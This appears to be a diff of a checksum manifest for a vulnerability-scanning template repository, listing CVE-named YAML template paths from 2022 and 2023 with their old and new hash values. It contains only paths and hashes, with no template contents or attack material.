+http/cves/2022/CVE-2022-46934.yaml:8d354fbe911557df1cc844b6232ade34f4f5eb16 +http/cves/2022/CVE-2022-47002.yaml:c88d7fc5f6ef2a137784454c10fb8e58aff46cda +http/cves/2022/CVE-2022-47003.yaml:92e262a5f70a8ce6260d31fb298692bea1b94842 +http/cves/2022/CVE-2022-47075.yaml:c54e3130e13f3ad7f9bb63f5239934c69703a41f +http/cves/2022/CVE-2022-47615.yaml:e569bad4943eb8adb2bc7aea3106301b196a4690 +http/cves/2022/CVE-2022-47945.yaml:da342aa0f6291e34630b38898450be248a1af89b +http/cves/2022/CVE-2022-47966.yaml:235f0cc8850f3729032b7cdb457eb7f6435a06ff +http/cves/2022/CVE-2022-47986.yaml:f6338efc2384a40314835f490557350ba6a40384 +http/cves/2022/CVE-2022-48012.yaml:a54c5dfcf05e6c452174cd294bbd0ceb08aaeb70 +http/cves/2022/CVE-2022-48165.yaml:0dcc837b13d26f0e7e72aa1a3b30923bf0d6af73 +http/cves/2022/CVE-2022-48197.yaml:423338021d4cb8930391e5c900eb254e9a0f184e +http/cves/2022/CVE-2022-4897.yaml:485f1b5cb15c151765e08afd0eb116fc32e0974b +http/cves/2023/CVE-2023-0099.yaml:921ac5e791e1e0f4038dc40e854b98a8cfef953f +http/cves/2023/CVE-2023-0126.yaml:5db20516ca6f79270b144fa95e72f97bab978a37 +http/cves/2023/CVE-2023-0236.yaml:5006ac04dd619706c2dae8caa761a47d4d783ac6 +http/cves/2023/CVE-2023-0261.yaml:a82bc9b8523a51632539e6108fb53e0dc5a4b932 http/cves/2023/CVE-2023-0297.yaml:49d20c394effbc10b20f06ecb8090927e9f919d7 -http/cves/2023/CVE-2023-0334.yaml:d79e89f26fce21fb42cf99429b939b9ef68a3343 -http/cves/2023/CVE-2023-0448.yaml:e586dbf6dc3266308c5ed2e70574081ba7c76d48 -http/cves/2023/CVE-2023-0514.yaml:a8f81f8dd2f9c016cc45fe45c074d291bd27aff6 -http/cves/2023/CVE-2023-0527.yaml:2d08cee6e7c7621a7d0c02f90c88c6a1b369996d -http/cves/2023/CVE-2023-0552.yaml:43f393ad5f7e14d9c05785d32fd2a14b8e3262a7 -http/cves/2023/CVE-2023-0562.yaml:29623587dbca0d8004d3a350fe603d1f64f7f057 -http/cves/2023/CVE-2023-0563.yaml:2425c385ea4baab846dd76d8e7b2831d0779ba0e -http/cves/2023/CVE-2023-0600.yaml:bc056f50b7bb8d9181d8d05d2d0182348ace4c8a -http/cves/2023/CVE-2023-0602.yaml:5cbc208a4f5bc3ae16edb3e773437750ce9cf838 -http/cves/2023/CVE-2023-0630.yaml:839eaf7c113e4bbb0d400b6ba4a16838cc40e69d -http/cves/2023/CVE-2023-0669.yaml:e5a3638fbec483e52cc59da62c4f4e411b5963a4 -http/cves/2023/CVE-2023-0777.yaml:a0b943327ce996cc616f605f2be45f6993260d71 -http/cves/2023/CVE-2023-0900.yaml:900a59cfbce5bda78be6d3f918d66f490717e747 -http/cves/2023/CVE-2023-0942.yaml:e3ad3749dbf8eb2836532a3c58b5c0e5da299995 -http/cves/2023/CVE-2023-0947.yaml:b5b5c025c11cd6cabae57b7a327d52aea7dbba39 -http/cves/2023/CVE-2023-0948.yaml:6fd23c3a6e4bda3740501408dfb41b24ab1ffb43 -http/cves/2023/CVE-2023-0968.yaml:71343e010978de97f569b79be06ffd6c9a885630 -http/cves/2023/CVE-2023-1020.yaml:9ee8c76b09e5ec84e4ed0eef45d7095046918456 -http/cves/2023/CVE-2023-1080.yaml:f6bffb9fe1834a2a2efc7a3c39f9d40c0cb1c4a7 -http/cves/2023/CVE-2023-1177.yaml:d506e6558cee4dcf36951fb908ef3fd01a2acc3a -http/cves/2023/CVE-2023-1263.yaml:859b755151d49f867492154d2f9afea5d8ad98a5 -http/cves/2023/CVE-2023-1362.yaml:4089b01d7db10e646dcf6a996bcb277f3f7e8f55 -http/cves/2023/CVE-2023-1408.yaml:4ac6c85b157647cd12156597acb5c269deb6bc66 +http/cves/2023/CVE-2023-0334.yaml:7024fb896e90042f329a81366b1f95282264fe08 +http/cves/2023/CVE-2023-0448.yaml:194255c7c63b0449fd7bbd37971ea87efd95db46 +http/cves/2023/CVE-2023-0514.yaml:5e022d5382b067be9adacf38854aad3653452b9c +http/cves/2023/CVE-2023-0527.yaml:067a3e0b1ac7562921fb82fc81b72b710af79441 +http/cves/2023/CVE-2023-0552.yaml:7301c8ad680b8fefebd0fa1bd40e133fefe4e985 +http/cves/2023/CVE-2023-0562.yaml:ef5b8e6f96fc40f621d9703c768344c53c9fa6ed +http/cves/2023/CVE-2023-0563.yaml:79a33e0a112558f3361ed433f16b913105b7a31f +http/cves/2023/CVE-2023-0600.yaml:9b3723b5b7aeb67b6e9ab11b2b48a9eba8bdaa50 +http/cves/2023/CVE-2023-0602.yaml:11555b3dd07a3053c9b8d4f403115b6f97377c31 +http/cves/2023/CVE-2023-0630.yaml:f88e2c0ed81473c363728c6c55e943fe1a9eb97a +http/cves/2023/CVE-2023-0669.yaml:a3f09d272e9bae1d5e8d2d710ec290a26582f1d6 +http/cves/2023/CVE-2023-0777.yaml:87d070e3b8c23dcef3d13841458da82035d1e6c0 +http/cves/2023/CVE-2023-0900.yaml:43d45c05decf8042290bd7a8a79fceed9346130e +http/cves/2023/CVE-2023-0942.yaml:e63645a7ef99967730b2b4091e7a82449e26643d +http/cves/2023/CVE-2023-0947.yaml:6853e8c7f778123e681e18ec0887c59feb10139f +http/cves/2023/CVE-2023-0948.yaml:55e3292e3ccb69af2492ccc90947cabf5329086b +http/cves/2023/CVE-2023-0968.yaml:0bfb7c5ef87e285801d9655346a2e48c19021ae0 +http/cves/2023/CVE-2023-1020.yaml:fc8351ee70efde0a3204c1373613f4b3e344e24c +http/cves/2023/CVE-2023-1080.yaml:107809583d91ff23e80378a73ebd5c0b476df4d3 +http/cves/2023/CVE-2023-1177.yaml:dc6e9cf3c9ddf68e97f003208e769c6421e9587e +http/cves/2023/CVE-2023-1263.yaml:ab4528ad44ab36281057899cd9f8e67978441bec +http/cves/2023/CVE-2023-1362.yaml:c35648f89935f6a3567ce845b9c6445b02e7cdac +http/cves/2023/CVE-2023-1408.yaml:2effe03f7efeb2749ad1e9a637738ffad1a68f40 http/cves/2023/CVE-2023-1434.yaml:8d9ea6102d27ff45261b9622412d4a1ab23b96b1 -http/cves/2023/CVE-2023-1454.yaml:0d13a7e69773c787ef10021c649a00c24084352f -http/cves/2023/CVE-2023-1496.yaml:d241ddb64b34633745d5303c1fd1c65014966fb2 -http/cves/2023/CVE-2023-1546.yaml:4fb03fe7dd63f6385445731a2f79080a0ff1b859 -http/cves/2023/CVE-2023-1671.yaml:9ecc7cb6c6977775d98a5dc5c33dbfc3eb852c7e -http/cves/2023/CVE-2023-1698.yaml:7014dcc0ce750cc2750308ff4042c267e072d39b -http/cves/2023/CVE-2023-1730.yaml:d08e8d3912c87e986b5e82f52ba0d2a0698b2c56 -http/cves/2023/CVE-2023-1780.yaml:738e0b661a985bb5ed7ab5f7906c785b17d441c4 -http/cves/2023/CVE-2023-1835.yaml:f113c83a7296f2f2e5e0ed64cdbc0f873baec1d3 -http/cves/2023/CVE-2023-1880.yaml:9b586d24b635725555c69340b5c79962aeaaf3d4 -http/cves/2023/CVE-2023-1890.yaml:9b2ddcabcd7f6100fb79a65a551b5b56f605e700 -http/cves/2023/CVE-2023-20073.yaml:ed12fd4c43cce4bf6bb1d7684be518ee13399d78 -http/cves/2023/CVE-2023-2009.yaml:14b3c7af5ca9d42bceecde41b0fbe8d70ae9ce25 -http/cves/2023/CVE-2023-20198.yaml:7ecc5f5bedac073679250c47a7c42c5ac70fff23 -http/cves/2023/CVE-2023-2023.yaml:a406a1b96f0d972134eb7622b0bb4ca3a3501e61 -http/cves/2023/CVE-2023-20864.yaml:f3c6abf111fe41c45d12158a1cbbc35c6925a5ef -http/cves/2023/CVE-2023-20887.yaml:420b0aee0848875c7ebe0b3a4f6f8bf854fd462c -http/cves/2023/CVE-2023-20888.yaml:039e46646c875643497cf1921458de8c7ae4b1bb -http/cves/2023/CVE-2023-20889.yaml:0fbc7b44f01bd5fd1c33048e39a498af242a96e2 -http/cves/2023/CVE-2023-2122.yaml:5926b2c2001cc40b5ef1f1b5469e47616b377bc9 -http/cves/2023/CVE-2023-2130.yaml:6ad20ab8923c5f88eff168d30064c4cbb9a761d3 -http/cves/2023/CVE-2023-2178.yaml:b90ff2220b11f1f2092b83f1da3ce6b0c7955dbb -http/cves/2023/CVE-2023-2224.yaml:8c6bec14ed0a6f2575ed0dc73ab202ed5f42e556 -http/cves/2023/CVE-2023-22432.yaml:bec2e11fec7371e77ed84fb28f8cd11618107896 -http/cves/2023/CVE-2023-22463.yaml:448ca74bc9e4cd19b34c5736305e6f86ca3fe6f7 -http/cves/2023/CVE-2023-22478.yaml:633745da585a588b32abafb22fce0dbe1f2726f7 -http/cves/2023/CVE-2023-22480.yaml:ef6077b21c696a5ebe26f5d8a0a43eea8dedaf22 -http/cves/2023/CVE-2023-22515.yaml:54dcd724a6286a6317b0cbbc8df9a66a207e76fe -http/cves/2023/CVE-2023-22518.yaml:f2a1ddfabd7909de16dc1341fdc9f5f610e61762 +http/cves/2023/CVE-2023-1454.yaml:c041434eb4822659a8ed08a1c80560a2a510cd36 +http/cves/2023/CVE-2023-1496.yaml:30293973323bec522a2fb46365e5315392c4f4ca +http/cves/2023/CVE-2023-1546.yaml:4e106df019d8a6501304b0b0b2a7229576c78831 +http/cves/2023/CVE-2023-1671.yaml:3937b2658353845f479afea5fa9bd3e5249f750d +http/cves/2023/CVE-2023-1698.yaml:6fece6b0290e4bf491282c798bd7472406cbdb99 +http/cves/2023/CVE-2023-1730.yaml:1c7ac182bb3b4e8904f5e63ccbfebb1842d34955 +http/cves/2023/CVE-2023-1780.yaml:c232adcb8dfa8a9cc92929b8c61b0100a31ee954 +http/cves/2023/CVE-2023-1835.yaml:687cc40e019853340a712171d8b5360fac6711c8 +http/cves/2023/CVE-2023-1880.yaml:1e530d4bce346477b79a4241f66f4a2ecbb31f0b +http/cves/2023/CVE-2023-1890.yaml:95b5eaa38194b741d2a0b1c626890029755b4cd3 +http/cves/2023/CVE-2023-20073.yaml:dcee4e42fc1ddd52e54ca5ebabeab55eec6d9e10 +http/cves/2023/CVE-2023-2009.yaml:c1f5922d698a5632e8ee95b337605cc5c7ead2da +http/cves/2023/CVE-2023-20198.yaml:2e07845efae5520c14100989f392f685a1b9c74f +http/cves/2023/CVE-2023-2023.yaml:9a803ac937368e3301ae5d81f4a24e7d19e9de33 +http/cves/2023/CVE-2023-20864.yaml:95038af99f88d695b53bdb50645e77e4c0c99da6 +http/cves/2023/CVE-2023-20887.yaml:0d25c9c3e3e9cc129a7620123259f57adacc704f +http/cves/2023/CVE-2023-20888.yaml:559c6be8bcf64fab0a926050fad87d9121c5d9b7 +http/cves/2023/CVE-2023-20889.yaml:eec75dfaf1d90bf614fa51b83ad3900f992902f1 +http/cves/2023/CVE-2023-2122.yaml:fac65772d8607707d14f10c6cd2ac55b7b9c0d8a +http/cves/2023/CVE-2023-2130.yaml:2ccf8ae88fab90e7841b6c96758bf4331700ec3f +http/cves/2023/CVE-2023-2178.yaml:4dafaa83e4571b9523422399e200259a0bc1d4da +http/cves/2023/CVE-2023-2224.yaml:fcae213f1f85751bae6ef1505ef97c16bf65eb50 +http/cves/2023/CVE-2023-22432.yaml:01dd8016c3c1d048c3a8deb24e8bae413c04f85a +http/cves/2023/CVE-2023-22463.yaml:fc88e394e52a5de3f1bf10358a09711c4580d868 +http/cves/2023/CVE-2023-22478.yaml:9cc1ca31f1eb6c6cd581db1e9f2d76484068f305 +http/cves/2023/CVE-2023-22480.yaml:fec9d97bc8862e6cc0ece9c3572d59ba14e0a6ce +http/cves/2023/CVE-2023-22515.yaml:fb148dd29b247780e9c0c398076cfb84187898f7 +http/cves/2023/CVE-2023-22518.yaml:8154dfaaf3384b7441518fa6a048810a75eee063 http/cves/2023/CVE-2023-2252.yaml:bb02189bc936b107119e8db698983075c295bb78 -http/cves/2023/CVE-2023-22620.yaml:9cffdee4f2661c3058186240b30ce86d8c54c1d6 -http/cves/2023/CVE-2023-2272.yaml:42b7732c0451d7e4ee034bb370b41b56f9e5a70f -http/cves/2023/CVE-2023-22897.yaml:cef98f91a3a054f36fcc3c07076d48f8bc580595 -http/cves/2023/CVE-2023-23161.yaml:5d472a931ba5be9e89c24cc55516854f870e31d0 -http/cves/2023/CVE-2023-23333.yaml:ecaf83af240ddd3d51a26b1dda5ae02da7d2c3a1 -http/cves/2023/CVE-2023-23488.yaml:f1b6327643e707f15589f1225d1195129a97469c +http/cves/2023/CVE-2023-22620.yaml:f030c2ec023698df49b671508ed29c5ca5fd07d2 +http/cves/2023/CVE-2023-2272.yaml:69a2465362aab129165cf982d08c87abdae929e3 +http/cves/2023/CVE-2023-22897.yaml:43c4ca93ef19d3b36c95aa748ad68147d13679fc +http/cves/2023/CVE-2023-23161.yaml:e4ff6ceac4c61a70ef06a37c14565932e2e3c3d1 +http/cves/2023/CVE-2023-23333.yaml:c92bf82b7ab50634e7b44dac5b91d1d5cf1d860b +http/cves/2023/CVE-2023-23488.yaml:a79943e00e59ce6b51d0b59722a2f7558dd67e4d http/cves/2023/CVE-2023-23489.yaml:ec3a79481484e373fe324d9c8f356afb7f1d7f4e -http/cves/2023/CVE-2023-23491.yaml:9eea89cd8e849402796f7d4ccd5afcc8e302f28e -http/cves/2023/CVE-2023-23492.yaml:a74f79ff1e43b0ea9c46764c6d0eb172ae3fd7eb -http/cves/2023/CVE-2023-2356.yaml:336ff67b23959aeb4c8dc5ecd76e24109fc83f7a -http/cves/2023/CVE-2023-23752.yaml:148968158e37efa40bf53512d79bce6336850939 -http/cves/2023/CVE-2023-24044.yaml:4bf6a49d4a491a63167e92b17c3e600431479db3 -http/cves/2023/CVE-2023-24243.yaml:d81831489f0a7caee3d940d8fe28af659f9471a6 -http/cves/2023/CVE-2023-24278.yaml:68a22379a74f6c31cac800917e9e56d429695d16 -http/cves/2023/CVE-2023-24322.yaml:a7fcbb6bc729cdcbf5e5d075a9d1bf30cf03f9a6 +http/cves/2023/CVE-2023-23491.yaml:b4f3325065eaaa3be52cda03a8e7810aaeb5ce57 +http/cves/2023/CVE-2023-23492.yaml:fcf59a2ea13d7d392860b8fabeff136814553315 +http/cves/2023/CVE-2023-2356.yaml:6080123343dc9e583e471da320d4365149c66fe2 +http/cves/2023/CVE-2023-23752.yaml:519d649ec1355da711c180556c6c7fbf138d044b +http/cves/2023/CVE-2023-24044.yaml:9717fb3da26326dca566140a6873ad6ebe5faf2d +http/cves/2023/CVE-2023-24243.yaml:8f9735456736362cd93af96f454618fc9a8fc7b2 +http/cves/2023/CVE-2023-24278.yaml:eb1dd2640edf82cb8c6a1c8dd90e49d85c07efde +http/cves/2023/CVE-2023-24322.yaml:07644554f5dc0f6a652271eefa18d03c17fa4fc5 http/cves/2023/CVE-2023-24367.yaml:00eec3f3fabe9bd20f29ec7c09425ba7d6223c2c -http/cves/2023/CVE-2023-24488.yaml:af8aa03f843badbfa03ed376e704ef3d3d979cfa -http/cves/2023/CVE-2023-24489.yaml:9e2feddf720d1c3c6882de07be36d530069084ca -http/cves/2023/CVE-2023-24657.yaml:6cce7d1843b5e71b90c9ffdad5b06ddc7ec23ab7 -http/cves/2023/CVE-2023-24733.yaml:647876ab9cf5ac4a569af64078632d83525d9344 -http/cves/2023/CVE-2023-24735.yaml:5d558c9bf5abe0e71ca32538a2093c17f4da6433 -http/cves/2023/CVE-2023-24737.yaml:66aaf802b9030743802f5f8582a11f847b7ed219 +http/cves/2023/CVE-2023-24488.yaml:5a4936e6cc9ef316a446210b3ed9302f305e7c20 +http/cves/2023/CVE-2023-24489.yaml:3f4573b6eb61f0a99b19f74bbfbb66153232d907 +http/cves/2023/CVE-2023-24657.yaml:7f70e8a60ce533666bc2fcb56f1dd2d97962f0e0 +http/cves/2023/CVE-2023-24733.yaml:6d4709b2e2e4f568206de092c69b34ab8614314b +http/cves/2023/CVE-2023-24735.yaml:84cf033e04fe7bc95a4c8121e17b6fd09734d405 +http/cves/2023/CVE-2023-24737.yaml:c817587eb33b682e468b5970cd379eae1e15a903 http/cves/2023/CVE-2023-2479.yaml:f390e7f8a4eaee786b3eb5c81759e820b9065d55 -http/cves/2023/CVE-2023-25135.yaml:0c0586640d64999031816fb69dac3c27ee5359e1 -http/cves/2023/CVE-2023-25157.yaml:cae73e01a0ca99940f8d63fe6a19b8d93a0f559b -http/cves/2023/CVE-2023-25346.yaml:8b68d246e691a6cabf72139d4f7a347bc2b95462 -http/cves/2023/CVE-2023-25573.yaml:28692480a478de507ac7373b114e60228ccb7929 -http/cves/2023/CVE-2023-25717.yaml:7e22a30b85396eb430a6d22601661461be793e30 -http/cves/2023/CVE-2023-26067.yaml:9e70b9caa7d6025f6a7357e54b3af0bb577735b4 -http/cves/2023/CVE-2023-26255.yaml:cef7d976974297e865b07b78d488c149f12f9b8d -http/cves/2023/CVE-2023-26256.yaml:110dee4d4d553557404104ce65fd6dabff84663c -http/cves/2023/CVE-2023-26360.yaml:73a5ac71a9970d602290ba2f4bc38dec135e5568 +http/cves/2023/CVE-2023-25135.yaml:fd684d1768231e5a5186e19a2c53289c1acb096e +http/cves/2023/CVE-2023-25157.yaml:43c22de42fa4fa8b1fd762b770d539a9b4e5c6a4 +http/cves/2023/CVE-2023-25346.yaml:5aac2629d45db50d095f1503225581366be78e5a +http/cves/2023/CVE-2023-25573.yaml:854685fd6e74c55f6333d70505d9110a44a3a723 +http/cves/2023/CVE-2023-25717.yaml:f2cbb8758b7b4f614ba5d606ff6257fe1ba5145c +http/cves/2023/CVE-2023-26067.yaml:dc3ea3339cf08b165609cf441a50aedc2e3e3e86 +http/cves/2023/CVE-2023-26255.yaml:75d3fd24c8479fafbabf2f32125557ec11c7fd98 +http/cves/2023/CVE-2023-26256.yaml:7575e05bf00543e1cb31fef9a7e1377be0d72955 +http/cves/2023/CVE-2023-26360.yaml:025c8034cce4ea18d31588b7b53becee0bd4a658 http/cves/2023/CVE-2023-26469.yaml:7907b31bfd1d0b500fd39cc897387a0960a518cc -http/cves/2023/CVE-2023-2648.yaml:e7cb44b9a8760d6655f36ba99ac6914c820e03ab -http/cves/2023/CVE-2023-26842.yaml:40bd938d22d3b1bdda2f1c53ec6540902ea89925 -http/cves/2023/CVE-2023-26843.yaml:3746cce219def56bfe0d69bcf7a5712abedee8eb -http/cves/2023/CVE-2023-27008.yaml:9fe9ba5259658ab4ee28d0737f1fea1254270e18 -http/cves/2023/CVE-2023-27034.yaml:cf7ff718f6a106232b51bccaf298caa9bbc9a2f7 -http/cves/2023/CVE-2023-27159.yaml:694d5e1f361b9fbebc33829e349c2fd7cf5a3bec -http/cves/2023/CVE-2023-27179.yaml:505a7db1eae01bfeb679b249666913cb3ee78064 -http/cves/2023/CVE-2023-27292.yaml:eb0bf213a9fbf951c100652c483f0639b24bebab -http/cves/2023/CVE-2023-2732.yaml:353538970e4cb2115c969bb142a4a92329368f0a +http/cves/2023/CVE-2023-2648.yaml:17856f1c985f86a861ac321e5bb4f99972d9be1e +http/cves/2023/CVE-2023-26842.yaml:4d9f9e85af0cf0f6b0d665b6f73ca44da6234b70 +http/cves/2023/CVE-2023-26843.yaml:1cdd6d06ff1c914a6ce607a8b5850ae6f444f3ee +http/cves/2023/CVE-2023-27008.yaml:b6e191923a293067e2e0360c76c9920690105f6a +http/cves/2023/CVE-2023-27034.yaml:98a1f89879c7d663aafab0d564fe88ef087def57 +http/cves/2023/CVE-2023-27159.yaml:9e091453603b3510e5d5a7b91ae41d2c625d2c72 +http/cves/2023/CVE-2023-27179.yaml:c9749a3c34491910794763cef967493aa4688830 +http/cves/2023/CVE-2023-27292.yaml:91daa246b6aa71b2ee9fde3d45d94d3d5e7f5bb1 +http/cves/2023/CVE-2023-2732.yaml:b405179f87fdf7a5bc885f37cc989e1df166113c http/cves/2023/CVE-2023-27350.yaml:1943b6badb2a9494fde30e6a6a0ec1eb31781d86 -http/cves/2023/CVE-2023-27372.yaml:29ce21eef31607cdb7da3d5468827d286b245b8f -http/cves/2023/CVE-2023-27482.yaml:02319e639c6f520d4f640aab6ff9570a0bae3af1 -http/cves/2023/CVE-2023-27524.yaml:ad8445339ec5abe4d0ef62baf94eee32a05cd52a -http/cves/2023/CVE-2023-27587.yaml:414d3ccf4aff9e863ec051a97fcb464254c3699a -http/cves/2023/CVE-2023-2766.yaml:9807723124bcb93ae957130c76bf04aef203497c -http/cves/2023/CVE-2023-2779.yaml:dde0af01eede7860f09c52aa63f558c9626f5a08 -http/cves/2023/CVE-2023-2780.yaml:28e667d5488e3472c540eb591d05e32f438cb815 -http/cves/2023/CVE-2023-27922.yaml:d8e0b3e72a3c01eda5fdcf6f9dc2d166f70972a7 -http/cves/2023/CVE-2023-2796.yaml:306015de12810c74c99b18558a62177af96ae4d6 -http/cves/2023/CVE-2023-28121.yaml:7954d9b7ab3eb666dedf0abbf89d8d195794d420 -http/cves/2023/CVE-2023-2813.yaml:b63867bb1b45158913e335a6b07f9a007f2816d3 -http/cves/2023/CVE-2023-2822.yaml:0813f0622da8570de2d15b2b9cce8a6d4f0bd730 -http/cves/2023/CVE-2023-2825.yaml:17daf521198da11fbf14006f8086b2fdd649105e -http/cves/2023/CVE-2023-28343.yaml:42ea42dcefaee828231b7f792e504fc53510122b -http/cves/2023/CVE-2023-28432.yaml:b570824577e1d998cdb7fe07ed709f135ad2ffe2 -http/cves/2023/CVE-2023-28665.yaml:3c05d782bf1c7d1795cfab470142d6157172bda2 +http/cves/2023/CVE-2023-27372.yaml:6c1ed2812c2c99d992aab7b56fe30641bd19bee1 +http/cves/2023/CVE-2023-27482.yaml:7238fd5059b152aadb013c80d74daeaaa509fc12 +http/cves/2023/CVE-2023-27524.yaml:64ac88be3095dbb2411f8734a306b4ebe198d7aa +http/cves/2023/CVE-2023-27587.yaml:967d89755a72ca25ec9457bba7a2fa76f00f4255 +http/cves/2023/CVE-2023-2766.yaml:6a4c7346c1f5efdb802276490199795a3241b57b +http/cves/2023/CVE-2023-2779.yaml:04afaaceb43e52232438f92b64c8896ce1d66a26 +http/cves/2023/CVE-2023-2780.yaml:f3c958ea037f955024bc7b623c19c3b521af60e6 +http/cves/2023/CVE-2023-27922.yaml:8a21eac38d6dce4be0541027853e9695282147ba +http/cves/2023/CVE-2023-2796.yaml:4f6b771e44e6f3689858cf37de1c1b85362b7e28 +http/cves/2023/CVE-2023-28121.yaml:48fdbab0f2a22edcda2093133dcf5e140a22e051 +http/cves/2023/CVE-2023-2813.yaml:dcc99baffb96ce50341d7c64cf4bf6260e2ffff2 +http/cves/2023/CVE-2023-2822.yaml:fdcf9f4568d0ba6fc5de36e1b818977219d3b7c3 +http/cves/2023/CVE-2023-2825.yaml:8aab0b9d8e97984d593e905106848eec79ce0213 +http/cves/2023/CVE-2023-28343.yaml:65b1385b70099c77aa2b5043bcea27c45ba7ef30 +http/cves/2023/CVE-2023-28432.yaml:ff478c77d6cee741f083f7a197f5866258cedbbb +http/cves/2023/CVE-2023-28665.yaml:3c67be7991a7a3c010202085cda99ad7d1e88b22 http/cves/2023/CVE-2023-29084.yaml:5af292d033e3a19ad04ae1e6cc6473b596cd7cd5 -http/cves/2023/CVE-2023-29298.yaml:d9a4e574bdeb0e13631d8cc2cb81829a59296094 -http/cves/2023/CVE-2023-29300.yaml:0b2a24dd73eb6c2d367ef07a6c2dd0ee71d7fbd0 -http/cves/2023/CVE-2023-29357.yaml:f7311c3b98a8c5060facd7d4562213f96d8aaecf -http/cves/2023/CVE-2023-29439.yaml:b08107cc6c2ae03a5f989967b27c3874b406e4cb -http/cves/2023/CVE-2023-29489.yaml:2ef0ff57ec78247a9928cf26db1182b448e7b910 -http/cves/2023/CVE-2023-29622.yaml:e33884563025cc84d77030f2e15a3269d5eae5d2 -http/cves/2023/CVE-2023-29623.yaml:031c687754d21cfa2189da79e9a22b46d21e8b9d -http/cves/2023/CVE-2023-2982.yaml:6f9e8db73e51d60009476032f3cb27bd0ec6010d -http/cves/2023/CVE-2023-29887.yaml:000979dee117e69f5aecc9191eb4d0def49a5c60 -http/cves/2023/CVE-2023-29919.yaml:6b7764786a6620ec0d8c2256efc6852d9f2182df -http/cves/2023/CVE-2023-29922.yaml:4be4a7945412432a419e4fb79c17fb2524e9c924 -http/cves/2023/CVE-2023-29923.yaml:fdad78fa38a7ca38e83f1ca007b76df50682a11f -http/cves/2023/CVE-2023-30013.yaml:8182bae8998c4176d6e7f304237df1f6372d6055 -http/cves/2023/CVE-2023-30019.yaml:02484c95272de5cb1aa497d2d417f2e7d56497bc -http/cves/2023/CVE-2023-30150.yaml:947f9374ecb2fd360b4205bd799ff64e63dcff8e -http/cves/2023/CVE-2023-30210.yaml:3b25f1103299bad78170dadf1cc7648b4bc4bf8c -http/cves/2023/CVE-2023-30212.yaml:e6af4a4b026cb828b10e7719fd149250e752d282 -http/cves/2023/CVE-2023-30256.yaml:98a56e9b43285ed01be1da42a84ae19e4a12da1a -http/cves/2023/CVE-2023-30625.yaml:159a2c1da47b4bbfb33fd6b62dce63fef41a8a92 -http/cves/2023/CVE-2023-30777.yaml:c8836c63b958b8a0529bdadb9142cffc5db42dbd -http/cves/2023/CVE-2023-30868.yaml:1d8a23da714c073d63c4c30f74cccd74405b2438 -http/cves/2023/CVE-2023-30943.yaml:4eb61ab3cd2fb339af7e2b0ca42b084f8feef755 -http/cves/2023/CVE-2023-31059.yaml:34a5d6a5eb6789118ca7bf61ee23ee0fc1eac5ba -http/cves/2023/CVE-2023-31465.yaml:c5b3b224298b439d4f7fd1a8da3e7631552bd3dc -http/cves/2023/CVE-2023-31548.yaml:398d8739fcbf42e2883fcf6b665f84936f0ae818 +http/cves/2023/CVE-2023-29298.yaml:e31ca237a5d95bbc064f2f73c2a4f24558bebee4 +http/cves/2023/CVE-2023-29300.yaml:ee28b501053107de8bec89e2357d139d8a771503 +http/cves/2023/CVE-2023-29357.yaml:2b8586e46c40877e685c0d0b9c7dbac8e98ff770 +http/cves/2023/CVE-2023-29439.yaml:f233b91b3a117b42fa418eaf25b3b7fda646d373 +http/cves/2023/CVE-2023-29489.yaml:0cb6802617983be54a4738d8dde6c9bed88b7ebe +http/cves/2023/CVE-2023-29622.yaml:455ecd95e3c95a023b286e855746af9a72ffa365 +http/cves/2023/CVE-2023-29623.yaml:f507917a7c5dbeadcfbee68d846e47391c2fe77e +http/cves/2023/CVE-2023-2982.yaml:437475d3e9b9498918d8c585c8f329b7aaec876a +http/cves/2023/CVE-2023-29887.yaml:54180756d891832a8fd7770275a26627d23dd9d8 +http/cves/2023/CVE-2023-29919.yaml:b7da5c1e2e7b5af321ac2a1c75d2cecdc5bca201 +http/cves/2023/CVE-2023-29922.yaml:980d90ce178086025f90541d5ed4810c423f2a33 +http/cves/2023/CVE-2023-29923.yaml:b3d9499cb62afc611cd809b5f1a93dce9698d0e7 +http/cves/2023/CVE-2023-30013.yaml:ebd595a08c16ef8f4b8469dd53b95e60d59cd463 +http/cves/2023/CVE-2023-30019.yaml:3aad19e2674e5c34442fb5ffb5978e3f5888424d +http/cves/2023/CVE-2023-30150.yaml:e6831d23c50e75b321c0b720f6ab56688db0ae56 +http/cves/2023/CVE-2023-30210.yaml:7d743fcc4860febaf5d35b0253517a491cb31fb4 +http/cves/2023/CVE-2023-30212.yaml:e5b9d95bd42ebc4cd43130170a90d06326b3af59 +http/cves/2023/CVE-2023-30256.yaml:6af42acf86a9d91f8696c94617cdfdea13c040f5 +http/cves/2023/CVE-2023-30625.yaml:3fd73ad76ca7dfc1c624c20a3164538ad73200ab +http/cves/2023/CVE-2023-30777.yaml:10453866c8d59c1f061a58a9392880b235cc1024 +http/cves/2023/CVE-2023-30868.yaml:bb70d0ff8c471dff3ba3d5d029eeaf16aad42185 +http/cves/2023/CVE-2023-30943.yaml:7120ddaeac7771e3481046b694b27220c0f26c3e +http/cves/2023/CVE-2023-31059.yaml:d824f8ddda27fa929a705a73073f4edead828d69 +http/cves/2023/CVE-2023-31465.yaml:d24c8b2522a2815b433fd4d097ed7c42dcfb4bc0 +http/cves/2023/CVE-2023-31548.yaml:dedd11924d0acce1332cc01746b7111c602ed671 http/cves/2023/CVE-2023-32117.yaml:d607de0b2e6561a6f63c504cd7a24a9fbedd78e6 -http/cves/2023/CVE-2023-3219.yaml:4acc63011f97e48fae9664eac92b8545bc4d7b53 -http/cves/2023/CVE-2023-32235.yaml:8aac49c635c7459404506989fb7612b2f9028a7e -http/cves/2023/CVE-2023-32243.yaml:c7ff168d3ae7477cef4f6b52665be142bfb3b596 +http/cves/2023/CVE-2023-3219.yaml:2d7a4d563b71b9c46cabe0e1b185c5f4ff6ad14a +http/cves/2023/CVE-2023-32235.yaml:3f460834c0c4b4ca2c1a98c2676dc71426e22b1e +http/cves/2023/CVE-2023-32243.yaml:cd7ee482a5224befdbcc571a3c99571e5a26a3ce http/cves/2023/CVE-2023-32315.yaml:3238b39d9d55fbd7acf0be333c6ee9fba4e13f76 -http/cves/2023/CVE-2023-32563.yaml:a7eb48ba0572c1a8c5cc4ac459c007966ad0c65d -http/cves/2023/CVE-2023-33338.yaml:8d64a68f7a20c175b1ac5cd906a0a2821796e5e8 -http/cves/2023/CVE-2023-33405.yaml:90f1128c213cea4e0f8b3d9dc4cb7d81c7afe40f -http/cves/2023/CVE-2023-33439.yaml:8c5a4622d4b483cb986dc3236734110f1468bdd6 -http/cves/2023/CVE-2023-33440.yaml:d524915c5c64bde3b2ee713749a00d2db6ff3d34 -http/cves/2023/CVE-2023-3345.yaml:d7d7e30ceffd2d9c8d9069e74ad248610087cbc1 